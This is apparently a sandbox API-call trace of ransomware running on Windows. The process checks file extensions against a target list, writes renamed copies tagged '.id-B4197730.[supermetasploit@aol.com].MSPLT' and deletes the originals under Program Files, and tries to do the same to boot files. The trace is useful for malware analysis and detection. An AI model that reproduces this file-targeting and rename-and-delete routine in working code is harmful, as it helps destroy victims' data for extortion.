[0321.485] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0321.485] lstrlenW (lpString=".bz2") returned 4 [0321.485] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0321.485] lstrlenW (lpString=".7z") returned 3 [0321.485] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0321.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.485] lstrlenW (lpString=".dbf") returned 4 [0321.485] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0321.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.486] lstrlenW (lpString=".1cd") returned 4 [0321.486] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0321.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.486] lstrlenW (lpString=".jpg") returned 4 [0321.486] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0321.486] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0321.486] lstrlenW (lpString="SAFRI_01.MID") returned 12 [0321.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0321.488] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=10122) returned 1 [0321.488] CloseHandle (hObject=0x53c) returned 1 [0321.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid")) returned 0x220 [0321.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0321.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0321.489] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.489] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0321.490] GetLastError () returned 0x0 [0321.491] ReadFile (in: hFile=0x53c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x278a, lpOverlapped=0x0) returned 1 [0321.494] WriteFile (in: hFile=0x52c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x2790, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x2790, lpOverlapped=0x0) returned 1 [0321.499] ReadFile (in: hFile=0x53c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0321.499] WriteFile (in: hFile=0x52c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xec, lpOverlapped=0x0) returned 1 [0321.500] SetEndOfFile (hFile=0x52c) returned 1 [0321.500] CloseHandle (hObject=0x52c) returned 1 [0321.500] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.500] SetEndOfFile (hFile=0x53c) returned 1 [0321.798] CloseHandle (hObject=0x53c) returned 1 [0321.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0321.799] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid")) returned 1 [0321.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.800] lstrlenW (lpString=".doc") returned 4 [0321.800] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0321.800] lstrlenW (lpString=".docx") returned 5 [0321.800] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0321.800] lstrlenW (lpString=".pdf") returned 4 [0321.800] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0321.800] lstrlenW (lpString=".xls") returned 4 [0321.800] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0321.800] lstrlenW (lpString=".xlsx") returned 5 [0321.800] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0321.800] lstrlenW (lpString=".ppt") returned 4 [0321.800] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0321.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.801] lstrlenW (lpString=".zip") returned 4 [0321.801] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0321.801] lstrlenW (lpString=".rar") returned 4 [0321.801] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0321.801] lstrlenW (lpString=".bz2") returned 4 [0321.801] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0321.801] lstrlenW (lpString=".7z") returned 3 [0321.801] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0321.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.801] lstrlenW (lpString=".dbf") returned 4 [0321.801] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0321.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.801] lstrlenW (lpString=".1cd") returned 4 [0321.801] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0321.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.801] lstrlenW (lpString=".jpg") returned 4 [0321.801] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0321.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.802] lstrlenW (lpString=".doc") returned 4 [0321.802] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0321.802] lstrlenW (lpString=".docx") returned 5 [0321.802] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0321.802] lstrlenW (lpString=".pdf") returned 4 [0321.802] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0321.802] lstrlenW (lpString=".xls") returned 4 [0321.802] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0321.802] lstrlenW (lpString=".xlsx") returned 5 [0321.802] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0321.802] lstrlenW (lpString=".ppt") returned 4 [0321.802] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0321.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.802] lstrlenW (lpString=".zip") returned 4 [0321.802] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0321.802] lstrlenW (lpString=".rar") returned 4 [0321.802] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0321.802] lstrlenW (lpString=".bz2") returned 4 [0321.803] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0321.803] lstrlenW (lpString=".7z") returned 3 [0321.803] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0321.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.803] lstrlenW (lpString=".dbf") returned 4 [0321.803] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0321.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.803] lstrlenW (lpString=".1cd") returned 4 [0321.803] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0321.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 68 [0321.803] lstrlenW (lpString=".jpg") returned 4 [0321.803] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0321.803] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0321.803] lstrlenW (lpString="SHOW_01.MID") returned 11 [0321.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0321.804] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=6392) returned 1 [0321.804] CloseHandle (hObject=0x53c) returned 1 [0321.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid")) returned 0x220 [0321.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0321.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0321.805] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.806] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0321.807] GetLastError () returned 0x0 [0321.807] ReadFile (in: hFile=0x53c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x18f8, lpOverlapped=0x0) returned 1 [0321.850] WriteFile (in: hFile=0x488, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x1900, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x1900, lpOverlapped=0x0) returned 1 [0321.853] ReadFile (in: hFile=0x53c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0321.853] WriteFile (in: hFile=0x488, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xea, lpOverlapped=0x0) returned 1 [0321.854] SetEndOfFile (hFile=0x488) returned 1 [0321.854] CloseHandle (hObject=0x488) returned 1 [0321.854] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.854] SetEndOfFile (hFile=0x53c) returned 1 [0321.861] CloseHandle (hObject=0x53c) returned 1 [0321.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) Thread: id = 49 os_tid = 0xe24 [0283.179] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x3936ba8 [0283.179] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x3fd0048 [0283.180] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc630 [0283.180] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6) returned 0x50b478 [0283.180] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc5e8 [0283.180] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x41d7020 [0283.183] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc678 [0283.183] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc678, Size=0x20) returned 0x4adfe8 [0283.183] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc600 [0283.183] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc600, Size=0x20) returned 0x4adf70 [0283.183] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0283.184] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0283.184] Wow64DisableWow64FsRedirection (in: OldValue=0x371ff50 | out: OldValue=0x371ff50*=0x0) returned 1 [0283.184] lstrlenW (lpString="kernel32.dll") returned 12 [0283.184] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adfe8 | out: hHeap=0x470000) returned 1 [0283.184] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0283.184] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adf70 | out: hHeap=0x470000) returned 1 [0283.184] Sleep (dwMilliseconds=0x64) [0283.509] Sleep (dwMilliseconds=0x64) [0283.792] Sleep (dwMilliseconds=0x64) [0284.039] Sleep (dwMilliseconds=0x64) [0284.325] Sleep (dwMilliseconds=0x64) [0284.489] Sleep (dwMilliseconds=0x64) [0284.823] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0284.823] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0284.823] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0284.835] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=76632) returned 1 [0284.835] CloseHandle (hObject=0x390) returned 1 [0284.835] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0284.835] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0284.835] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0284.835] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.835] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.835] lstrlenW (lpString=".doc") returned 4 [0284.836] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.836] lstrlenW (lpString=".docx") returned 5 [0284.836] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.836] lstrlenW (lpString=".pdf") returned 4 [0284.836] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.836] lstrlenW (lpString=".xls") returned 4 [0284.836] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0284.836] lstrlenW (lpString=".xlsx") returned 5 [0284.836] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0284.836] lstrlenW (lpString=".ppt") returned 4 [0284.836] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.836] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.836] lstrlenW (lpString=".zip") returned 4 [0284.836] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0284.836] lstrlenW (lpString=".rar") returned 4 [0284.836] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0284.836] lstrlenW (lpString=".bz2") returned 4 [0284.836] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.836] lstrlenW (lpString=".7z") returned 3 [0284.836] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.836] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.836] lstrlenW (lpString=".dbf") returned 4 [0284.836] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.836] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.836] lstrlenW (lpString=".1cd") returned 4 [0284.836] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.836] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.837] lstrlenW (lpString=".jpg") returned 4 [0284.837] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.837] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.837] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.837] lstrlenW (lpString=".doc") returned 4 [0284.837] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.837] lstrlenW (lpString=".docx") returned 5 [0284.837] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.837] lstrlenW (lpString=".pdf") returned 4 [0284.837] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.837] lstrlenW (lpString=".xls") returned 4 [0284.837] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0284.837] lstrlenW (lpString=".xlsx") returned 5 [0284.837] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0284.837] lstrlenW (lpString=".ppt") returned 4 [0284.837] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.837] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.837] lstrlenW (lpString=".zip") returned 4 [0284.837] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0284.837] lstrlenW (lpString=".rar") returned 4 [0284.837] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0284.837] lstrlenW (lpString=".bz2") returned 4 [0284.837] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.837] lstrlenW (lpString=".7z") returned 3 [0284.837] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.838] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.838] lstrlenW (lpString=".dbf") returned 4 [0284.838] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.838] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.838] lstrlenW (lpString=".1cd") returned 4 [0284.838] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.838] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0284.838] lstrlenW (lpString=".jpg") returned 4 [0284.838] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.838] Sleep (dwMilliseconds=0x64) [0285.116] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.116] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.117] CreateFileW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0285.117] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=74072) returned 1 [0285.117] CloseHandle (hObject=0x3b8) returned 1 [0285.117] GetFileAttributesW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui")) returned 0x20 [0285.118] GetFileAttributesW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.118] CreateFileW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.118] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.118] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.118] lstrlenW (lpString=".doc") returned 4 [0285.118] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.118] lstrlenW (lpString=".docx") returned 5 [0285.118] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.118] lstrlenW (lpString=".pdf") returned 4 [0285.118] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.118] lstrlenW (lpString=".xls") returned 4 [0285.118] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.118] lstrlenW (lpString=".xlsx") returned 5 [0285.118] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.118] lstrlenW (lpString=".ppt") returned 4 [0285.118] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.118] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.118] lstrlenW (lpString=".zip") returned 4 [0285.118] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.118] lstrlenW (lpString=".rar") returned 4 [0285.119] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.119] lstrlenW (lpString=".bz2") returned 4 [0285.119] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.119] lstrlenW (lpString=".7z") returned 3 [0285.119] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.119] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.119] lstrlenW (lpString=".dbf") returned 4 [0285.119] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.119] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.119] lstrlenW (lpString=".1cd") returned 4 [0285.119] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.119] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.119] lstrlenW (lpString=".jpg") returned 4 [0285.119] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.119] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.119] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.119] lstrlenW (lpString=".doc") returned 4 [0285.119] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.119] lstrlenW (lpString=".docx") returned 5 [0285.119] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.119] lstrlenW (lpString=".pdf") returned 4 [0285.119] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.119] lstrlenW (lpString=".xls") returned 4 [0285.119] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.119] lstrlenW (lpString=".xlsx") returned 5 [0285.120] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.120] lstrlenW (lpString=".ppt") returned 4 [0285.120] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.120] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.120] lstrlenW (lpString=".zip") returned 4 [0285.120] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.120] lstrlenW (lpString=".rar") returned 4 [0285.120] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.120] lstrlenW (lpString=".bz2") returned 4 [0285.120] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.120] lstrlenW (lpString=".7z") returned 3 [0285.120] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.120] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.120] lstrlenW (lpString=".dbf") returned 4 [0285.120] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.120] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.120] lstrlenW (lpString=".1cd") returned 4 [0285.120] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.120] lstrlenW (lpString="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 29 [0285.120] lstrlenW (lpString=".jpg") returned 4 [0285.120] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.121] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 